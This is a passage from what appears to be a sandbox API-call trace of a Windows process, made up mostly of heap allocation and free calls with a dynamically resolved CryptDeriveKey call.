hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0253.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0253.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0253.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0253.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0253.976] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0253.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0253.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.977] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0253.977] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.977] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.978] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.978] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0253.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.978] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0253.978] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0253.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0253.979] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0253.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0253.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.980] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.980] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0253.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0253.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0253.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0253.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0253.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.980] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0253.980] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0253.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0253.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0253.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0253.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0253.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.982] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0253.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0253.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0253.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa7c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0253.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0253.984] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0253.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0253.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0253.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0253.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0253.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0253.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0253.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0253.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0253.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0253.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0253.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0253.985] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa58a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0253.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0253.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0253.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0253.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0253.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0253.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0253.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0253.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0253.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0253.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0253.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0253.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0253.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0253.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0253.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0253.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0253.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0253.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0253.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0253.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0253.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0253.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0253.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0253.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0253.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0253.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0253.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.988] 